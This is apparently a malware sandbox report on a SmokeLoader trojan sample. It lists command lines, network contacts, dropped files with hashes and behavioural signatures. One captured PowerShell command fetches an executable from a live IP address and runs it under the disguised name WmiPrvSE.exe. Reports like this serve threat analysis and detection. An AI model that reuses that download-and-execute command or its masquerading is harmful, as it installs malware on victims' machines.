C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 sdfjhuz.com udp
JM 63.143.98.185:80 sdfjhuz.com tcp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
PL 79.96.138.166:443 sportessentia.home.pl tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.65.24:443 api.2ip.ua tcp
US 104.21.65.24:443 api.2ip.ua tcp
US 8.8.8.8:53 sajdfue.com udp
JM 63.143.98.185:80 sdfjhuz.com tcp
CO 190.249.149.134:80 sajdfue.com tcp
CO 190.249.149.134:80 sajdfue.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.154.77:443 steamcommunity.com tcp
DE 5.75.208.156:80 5.75.208.156 tcp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
US 8.8.8.8:53 nessotechbd.com udp
US 192.185.16.114:443 nessotechbd.com tcp
US 192.185.16.114:443 nessotechbd.com tcp
US 8.8.8.8:53 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly udp
US 209.141.39.59:443 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly tcp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
NL 195.20.16.82:443 tcp
NL 195.20.16.82:443 tcp
US 8.8.8.8:53 lknusantararaya.com udp
ID 103.147.154.49:443 lknusantararaya.com tcp
ID 103.147.154.49:443 lknusantararaya.com tcp
US 8.8.8.8:53 streamingplay.site udp
BR 45.152.46.72:443 streamingplay.site tcp
BR 45.152.46.72:443 streamingplay.site tcp
US 8.8.8.8:53 www.upload.ee udp
FR 51.91.30.159:443 www.upload.ee tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.4:443 github.com tcp
RU 185.215.113.45:80 185.215.113.45 tcp
US 8.8.8.8:53 topgamecheats.dev udp
BG 93.123.39.96:443 topgamecheats.dev tcp
NL 193.222.96.225:80 193.222.96.225 tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp

Files

memory/2584-1-0x0000000000290000-0x0000000000390000-memory.dmp

memory/2584-2-0x00000000001B0000-0x00000000001BB000-memory.dmp

memory/2584-3-0x0000000000400000-0x0000000000720000-memory.dmp

memory/1196-4-0x0000000002980000-0x0000000002996000-memory.dmp

memory/2584-5-0x0000000000400000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Roaming\igrvrtd

MD5 15fbdb93344afb1b663ace05ee0d40c1
SHA1 03cc060e4c749212cdbce07aeed5623e4f94c27e
SHA256 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
SHA512 60f19cc94ff20a2675f906bdd4166df49336018d7362e03386e3dc2bf886ee35e31f4d0955738bea39a0943bea03661cb00405ff03736e9c2349f24b028bcabb

memory/2468-14-0x0000000000880000-0x0000000000980000-memory.dmp

memory/2468-15-0x0000000000400000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F49C.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/1196-25-0x0000000003910000-0x0000000003926000-memory.dmp

memory/2468-26-0x0000000000400000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4912.exe

MD5 f772938618715239d925c7b7943c5582
SHA1 0312bdaca177849dea6df975a70e768ee56cccf4
SHA256 a2c5938f8e1aeebff52a3077b1bf3ddb8666ea539886846fb64db6c012c8cd33
SHA512 6a259c1ced90aded5dc99173831cff6314287af90e9181cbc701221f93f2407714e991ee3881c4e79409081179c1a53e67e5a756f793bfd40fa9f76693a31213

memory/2572-36-0x0000000000290000-0x0000000000322000-memory.dmp

memory/2572-37-0x0000000000290000-0x0000000000322000-memory.dmp

memory/2572-38-0x0000000001D60000-0x0000000001E7B000-memory.dmp

memory/2456-41-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2456-43-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2456-46-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2456-47-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2456-70-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2340-71-0x00000000002C0000-0x0000000000352000-memory.dmp

memory/2340-86-0x00000000002C0000-0x0000000000352000-memory.dmp

memory/2312-88-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-92-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d67fa48cf6cf5f1818b732ea24db1d6e
SHA1 44858909775b98c384307149a53b231f084427f6
SHA256 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27
SHA512 c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 b642c2ba174da9d65a8cdc4048780293
SHA1 aa40992c96b49e57eab03a7f57983d3388197e32
SHA256 b6b36f5f2d84838c75521393d4f9f936bcef87fa9bd804503401eb0b8517f5ab
SHA512 742661c298f05cbb1b2f52489149cdecfbad1f9c2a8364295e5f9e7525cd3e012fe482d8f066a72beceb684d9d77ebc3cbb599018cfb4764b9d6ef9eb3199054

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 a50b02a961c31efcbe1cf881d0e436b0
SHA1 82e575657203fc8d19c05ead8b68b947195c9360
SHA256 cbc4e81175c4eb7b25521c4ba4a9666a685370c85e3cef407e0ddd70c1f9f9ab
SHA512 f08d01ddfab3f18a746997f6f80a803e18e14b0a87e51146fb2709645d077cde69f8dbdf138efaab79117317c38f8f9a88698dc89a3cfe2163850f5826235fc6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c177018f8a90adbd895ed636688cc98
SHA1 3f4771a0fdc807467399e931e8ddd21d566074a1
SHA256 796721074a88f491348d0f88c05e58cf6eea4b3cdadc64d243a16208dd1fdc7d
SHA512 128ff1a89a4892b605d0daf8cd88635a26df021048404e345d5c5f4a18910b9908b2a241cc3544b115d2107e804780dd621ae5a8da6f1113af3951a78ae3a472

C:\Users\Admin\AppData\Local\Temp\CabA43B.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

memory/2312-107-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-108-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-110-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-114-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-117-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-116-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2312-118-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe

MD5 47704f454af8641dac1af2e2768d7881
SHA1 e3341bfdec84f69684aecde18cab2864519c7728
SHA256 a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64
SHA512 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25

memory/568-135-0x0000000000260000-0x0000000000360000-memory.dmp

memory/568-136-0x0000000000730000-0x0000000000761000-memory.dmp

memory/2128-134-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2128-138-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2128-141-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2128-142-0x0000000000400000-0x0000000000644000-memory.dmp

\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/2312-153-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar5BC8.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar5D54.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/1548-201-0x0000000000C50000-0x0000000000D50000-memory.dmp

memory/2808-200-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1548-202-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2808-204-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2808-207-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2808-208-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2128-210-0x0000000000400000-0x0000000000644000-memory.dmp

memory/1868-227-0x0000000000230000-0x0000000000330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DFB7.exe

MD5 9e52aa572f0afc888c098db4c0f687ff
SHA1 ef7c2bb222e69ad0e10c8686eb03dcbee7933c2b
SHA256 4a40f9d491f09521f4b0c6076a0eb488f6d8e1cf4b67aa6569c2ccce13556443
SHA512 d0991e682ae8c954721e905753b56c01f91b85313beb9996331793c3efa8acc13d574ef5ba44853ecc3e05822931ed655bad1924fa11b774a43e015f42185f62

memory/2684-235-0x0000000000A60000-0x0000000001745000-memory.dmp

memory/2684-244-0x0000000000A60000-0x0000000001745000-memory.dmp

memory/2684-273-0x00000000001D0000-0x00000000001D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\DFB7.exe

MD5 e2ebfec64d8bd97a0f742ca80c58a2cf
SHA1 647ba7618ef94e1faf9c7bd6697a3672ce59ce51
SHA256 d26e2bdc1d1ea864335e8f261f48cfd9628eaf25f9414af05e59f780cdbbde4a
SHA512 e9839a52637945d078bb54c5dcefdbc7094b5753215cac9c1053f1d34a1d833b52ff31fe0935076cdad0616fd73338ed40269462f2323373084ebf44bb8a481a

\Users\Admin\AppData\Local\Temp\7D2.exe

MD5 d8133933c35b3641839b23fd75109c45
SHA1 a80e7473903a2d79fac4198bb5a80fc6ea968c87
SHA256 9393404a775a29519a48dedcefc783a2063e69a2c66cf106d23fa4d1c60ae547
SHA512 9bfdc4fdeaeb87c737aeb54ee0575a2bb1e0e13636a173e144f97559c88d05971910c7f3c569ba8a361eea349960eaf1066c41afafa4b4b35f8c91bdd20f66a4

C:\Users\Admin\AppData\Local\Temp\7D2.exe

MD5 450039a02217c53bd983eaf1fd34505a
SHA1 930ed58a2f58ca7bf3e39aaee43fb541f1c6eeda
SHA256 d2eacbc922f248856b860aa7c31476ae4123f97e82cf69760ef216d9dca321f0
SHA512 cf37a82ea7b64f4633ac82c73feff3f829dda279a7caeac32a4cde7b0f82a43b37f67e620677a87d2eccc0eee6f8d68d0175a086487b2174b4f30b66aa4fb080

memory/2684-297-0x0000000000A60000-0x0000000001745000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

MD5 efc1577f95c9a449fcaf9c8c4ba97486
SHA1 9f8c996d0b1d5994449e32e32ec5b29af4f62b70
SHA256 6ab35dffd2a577d4e2478bcfa21fd1d17fc498c57582e0caaa518ecdf5c4c037
SHA512 c97fa8c4773d9f2058ca777a4a5d786ed9c5271f15553fd66cd2b50d3edbfda4af86cd0108aa291f6373e27e7f699dd36f9537b8041044492a03bbf2c7295ba2

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

MD5 bb2197a07962bd9e84512680932621a2
SHA1 82c0278ced2d0b9241b13860f45fc499033a0956
SHA256 ca83b6d4ac408784b71721c0b97981a55cdf14431c8754c232f77450d4254094
SHA512 04bdf960039d489bd79bfdb6590beb2d75ebce068abd0b5726852be401b52961c60062920e40e3ad8d1ccc1fea3204f4c85d02702b2b4796a32a7a79afb2aded

memory/668-307-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/668-308-0x0000000076FA0000-0x0000000076FA2000-memory.dmp

memory/668-309-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/668-310-0x0000000002210000-0x0000000002212000-memory.dmp

memory/668-312-0x0000000000940000-0x0000000000941000-memory.dmp

memory/668-311-0x0000000002330000-0x0000000002331000-memory.dmp

memory/668-313-0x0000000002470000-0x0000000002471000-memory.dmp

memory/668-315-0x00000000008C0000-0x00000000008C1000-memory.dmp

memory/668-316-0x0000000000930000-0x0000000000931000-memory.dmp

memory/668-314-0x0000000000560000-0x0000000000561000-memory.dmp

memory/668-317-0x0000000002460000-0x0000000002461000-memory.dmp

memory/668-319-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/668-318-0x00000000008B0000-0x00000000008B1000-memory.dmp

memory/668-320-0x00000000008E0000-0x00000000008E1000-memory.dmp

memory/668-321-0x0000000002480000-0x0000000002481000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\61F4.exe

MD5 0de19cd17462ea79db1a5e5fd1d7f59f
SHA1 d2b313dcfbda9a04475fc01182336b52846bbe3b
SHA256 c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b
SHA512 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c

memory/2952-333-0x0000000000230000-0x0000000000330000-memory.dmp

memory/2952-334-0x0000000001BD0000-0x0000000001C3F000-memory.dmp

memory/2952-335-0x0000000000400000-0x00000000004AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\70C4.exe

MD5 f727c0754ddda4ed6354375ab748735b
SHA1 2ad7d52a12f896817edfe511ec26212580dc5958
SHA256 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899
SHA512 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3

memory/832-341-0x0000000072880000-0x0000000072F6E000-memory.dmp

memory/832-340-0x0000000000800000-0x000000000089A000-memory.dmp

memory/668-347-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/2952-349-0x00000000026A0000-0x00000000026A1000-memory.dmp

memory/2952-358-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/668-359-0x0000000000570000-0x0000000000571000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

MD5 98a8cb3f57539407ce621d4c6e7eca22
SHA1 cfba7b6935b6d3ccc0c468df459c9833d49fe287
SHA256 a89c33a00af285e59bf6d0c4fa32d71a7bfac103c9f69e3ec80afa84e2aa08da
SHA512 66738703799be176d5a086ed48ceac9499a88c9a2bf4b1a588f185de6f615cbc84568c07a7eb6fb3f7d5569f223a7d0f6bf49f7a44643452fabc1c22fd1efeeb

memory/668-364-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/668-366-0x0000000002770000-0x0000000002771000-memory.dmp

memory/668-367-0x0000000000960000-0x0000000000E02000-memory.dmp

memory/832-370-0x0000000009270000-0x00000000092B0000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2832-377-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-378-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-379-0x0000000002680000-0x00000000026C0000-memory.dmp

memory/2832-380-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-381-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2484-382-0x0000000002680000-0x00000000026C0000-memory.dmp

memory/2832-383-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2832-384-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2932-386-0x00000000005D0000-0x00000000006D0000-memory.dmp

memory/2932-387-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/2484-393-0x000000006EDE0000-0x000000006F38B000-memory.dmp

memory/2832-394-0x000000006EDE0000-0x000000006F38B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\461186416230

MD5 d0ba858fef58669fbe660841cc1a6157
SHA1 224cb30a7779391b616e5bfae06a8a24b726adcb
SHA256 a3dd9a8710e1f41dc5d6e8cd6e1744aa367826cb740077e22df7a6e05bf37a07
SHA512 c19800e63d295e09e6c277222c846ae3cfc4e8c3e9a278c0e620657d035d6b69b267ab2ba27a4d3f30dd332f8da74b8b0b07ed63fcb5c7ec11eaffde4fa057a5

memory/832-402-0x0000000072880000-0x0000000072F6E000-memory.dmp

memory/1188-408-0x00000000008F0000-0x00000000009F0000-memory.dmp

memory/832-416-0x0000000009270000-0x00000000092B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 cb253bf8a6859eadd30b4ceb66c6a588
SHA1 7e9383d51ec36a019b5884f79a2ac2c05b4049bd
SHA256 03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722
SHA512 1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 4876ee75ce2712147c41ff1277cd2d30
SHA1 3733dc92318f0c6b92cb201e49151686281acda6
SHA256 bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed
SHA512 9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 fda0cdaf875e4daf0c482875f5a231e6
SHA1 459bd14e4b5773b333f134d4d70bcf4b94e4ece2
SHA256 b85f8c66e7ccbcf27c5b06c463d3f1fe2b5511406edbf2eaba123a6ad4aad5ed
SHA512 b6dc77346f4a35a8d0808d2cbcfbcec03867c4d76d1dc488ee68b3574b45af6694f5d525047f271826f74b9993c3ad58d591e520b2808543171510f0a2af26da

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 646474805e0a482a64c8fb0fd24cc193
SHA1 e0f3f06273ece606c9f652b446473dcc90525279
SHA256 a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd
SHA512 b0fb54455c5e9d20f61d9aef49969d9fb84fe89fde53ea42b4b01f4822a61308018a054c16277da6b8d91b3219c55deeaf8f568ac5a7b049e3aa2b6f64d53fb0

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 01a5858b5db7ecf9f3e7c5e6fd1444ca
SHA1 357d16d31867dba1119e78df7ba8559a5b6b9e24
SHA256 c14af4fa1c3a9df74306483ccee122ad9dc6849078038279db3996c02b5fc349
SHA512 5c6f53958c33b53e166ae52fe7707cf86f158bc7f2e0bbc04ecf98f6486babf18781c5a251eb2a68f629c69f17a6c80c05162fdde4a58e48853d1b22490fddbb

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 5bd578971972e12323f2c4033f52d7a2
SHA1 66253c74011718950a6425c61e81ccc4ef906f0f
SHA256 f0e2ed19ddddd7e5a6e46358e74088bce72d1e6028ea2db081dc311e5484f449
SHA512 2b1ccf5dff72b3a351613819a9437cf0d3aa6e8036029e1a2f5f1636cb9ab0ced399ef70cac7d30ef2f8edabe644df9d09f39121dec4463dd521a700ea099e17

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 d605ca01b165bd905586b87c5c89c276
SHA1 092572262fb11c44cac1a51de3b2e2c26842ea68
SHA256 f9f4ccdf63431abd99696354a89696e1b53f062921c44a005f486a3e6e45346b
SHA512 243f04c10c7d2aff46a8b9700bcd23f7d2a42687279c685e6239f673683fae6a0685838dd6ac4ea4eaf78c8b64c7d0b88f4d4ce93e85161dada030aae70e5063

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 c7e050428b9fa0683592b7b62064e87d
SHA1 c780fed59c78e33d85610290c84043a529af9b08
SHA256 e7bd37cd12fbf47e317815c366e51f59b713ba8b55f9bf258381d6a934614df9
SHA512 a4155e248240397f19696a53eb0638a2618e41c46f2c59899e44e0f407dbfa2265ee5ea329d988b47c40de420177a9c01a40c77788229fc200811b9689b3b825

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPTK2T6EEJKO4F1ZGR09.temp

MD5 61cd8de64ade8138ac9f87c1922e1426
SHA1 71a043d8591bd470b63f69af1a49dd365a18d07b
SHA256 3e9f3c51cf7be1d0566d3898363c96ffb33a3ac1e29a69c7e9b4ca0b6cdf887b
SHA512 048e9ac720f57bf74b584e25b7f759d4fc5a5791a8fc18f516dd02ffee541d975cba47e18f0ee14753cfda78f51674099090a3ec0dc221e98bd8e94622c55b42

memory/744-451-0x000000001B2B0000-0x000000001B592000-memory.dmp

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll

MD5 ca684dc5ebed4381701a39f1cc3a0fb2
SHA1 8c4a375aa583bd1c705597a7f45fd18934276770
SHA256 b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2
SHA512 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 00:59

Reported

2024-03-15 01:04

Platform

win10-20240221-en

Max time kernel

299s

Max time network

299s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\thdutdt N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\thdutdt N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\thdutdt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\thdutdt N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
